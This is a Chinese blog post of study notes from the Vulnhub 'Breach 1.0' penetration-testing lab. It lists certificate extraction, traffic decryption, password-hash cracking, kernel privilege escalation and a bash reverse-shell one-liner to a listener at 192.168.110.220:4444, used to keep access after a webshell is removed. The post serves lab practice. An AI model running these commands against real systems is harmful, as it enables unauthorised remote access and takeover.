Vulnhub渗透测试练习(一) ----------Breach1.0

倾然丶 夕夏残阳落幕 提交于 2019-12-06 07:38:44

教程网址

https://www.freebuf.com/articles/system/171318.html

学习经验总结

1.使用jre的bin目录下的keytool命令来输入秘钥库口令进而获取证书文件
2.将证书文件导入wireshark中,注意ip和端口
3.数据包http basic认证
4.使用cat /etc/passwd查看用户 /etc/passwd文件格式
5.漏洞查询库www.exploit-db.com(建议使用外网)
6.免费的md5解密网站 https://www.somd5.com/
7.若马经常被删除,可以建立反弹连接
echo "bash -i >& /dev/tcp/192.168.110.220/4444 0>&1" | bash
8.提权 python -c 'import pty;pty.spawn("/bin/bash")' (目的是可以使用su命令)
9.查看系统内核版本 uname -a和cat /etc/issue
存在本地提权漏洞内核版本是:Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04)
10.kali的strings命令
11.cat .bash_history查看历史命令
12.使用exiftool工具查看bill.png图片的exif信息
13.sudo -l查看用户执行脚本权限

标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!